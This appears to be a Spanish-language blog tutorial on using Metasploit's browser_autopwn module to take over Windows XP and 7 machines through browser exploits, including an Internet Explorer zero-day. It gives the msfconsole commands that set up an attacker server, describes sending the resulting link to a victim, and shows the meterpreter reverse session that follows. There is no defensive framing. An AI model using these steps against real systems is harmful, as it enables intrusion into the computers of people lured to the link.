En esta pequeña entrada se describirá como utilizar el modulo browser_autopwn
incluida en el Metasploit, la cual nos permitirá explotar cualquier
tipo de vulnerabilidad que afecten a los navegadores webs, obteniendo
asi una session meterpreter en el sistema vulnerable.
Metasploit ofrece la posibilidad de lanzar exploits de acuerdo a la
versión del browser que la victima este utilizando, por ejemplo cuando
utilizemos el modulo browser_autopwn esta buscara todos los
exploits respectivos para cualquier tipo de navegador, ya sea Internet
Explorer, Google Chorme, Firefox u Opera, de manera que cuando la
victima ejecute el link generado, esta automaticamente se aproveche de
la vulnerabilidad encontrada.
Por otro lado, para acceder a cualquier Sistema Windows 7 o XP nos
basaremos en la ultima vulnerabilidad 0-day que se registro en el
Navegador Internet Explorer versiones 7 - 8 y 9 la cual permite
que cualquier 'atacante' puede utilizar el exploit respectivo para tomar
acceso completo al sistema.
Veamos un poco mas detallado el trabajo que realiza el modulo browser_autopwn para apoderarse de una forma rápida y fácil de cualquier sistema Windows.
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
PROCEDIMIENTO DEL ATAQUE:
Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------------------------------------------------
use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.17 (IP del Atacante)
set srvhost 192.168.1.17 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 80 (Puerto)
exploit
------------------------------------------------------------------------------------------------------------------
Después de ejecutar el comando exploit, browser_autopwn empezara a buscar todos los exploits que pueda afectar a cualquier Navegador Web, ya sea en las vulnerabilidades de Java, Flash Player, WinZip, Apple Quick Time y unos cuantos mas, siempre y cuando tengamos el MSF actualizado.
Luego que la herramienta termine de 'buscar' todos los exploits que
afecten a los navegadores, esta mostrara cuantos exploits ha encontrado y
generara un link la cual sera enviada a la victima, como se aprecia en
la imagen siguiente:
Como se aprecia en la imagen, browser_autopwn encontró 39 exploits y genero una URL http://192.168.1.17:80/ la
misma que sera enviada a la victima para que lo ejecute desde su
navegador, de tal manera que esta URL pueda ejecutar cualquier exploit
en forma silenciosa y generar la conexion inversa.
Para tal caso, he ejecutado dicha URL en un Sistema Windows XP con Internet Explorer 7, de tal forma que browser_autopwn
pueda ejecutar el exploit respectivo para el Navegador, la cual si
logra ejecutarse sin problema alguno, esta devolverá una session
meterpreter, como se aprecia en la imagen siguiente:
Claramente se aprecia la forma en que trabaja browser_autopwn ya que la URL se ejecuto en un Navegador Internet Explorer, entonces esta inmediatamente ejecuto el ultimo exploit ie_execcommand_uaf de tal forma que el sistema quedo totalmente VULNERADO!
Seguidamente, podemos utilizar los comandos respectivos para mostrar
la información total del sistema y algunos que otros comandos que se
requiera dependiendo de lo que deseemos hacer en dicho sistema.
Como mencione lineas arriba, esto puede funcionar en cualquier Navegador Web y cualquier Sistema Operativo Windows, solo basta con tener nuestro MSF totalmente actualizado y estar al tanto de las ultimas vulnerabilidades que pueden afectar a los mismos!
VIDEO-DEMOSTRATIVO:
VIDEO-DEMOSTRATIVO:
No hay comentarios:
Publicar un comentario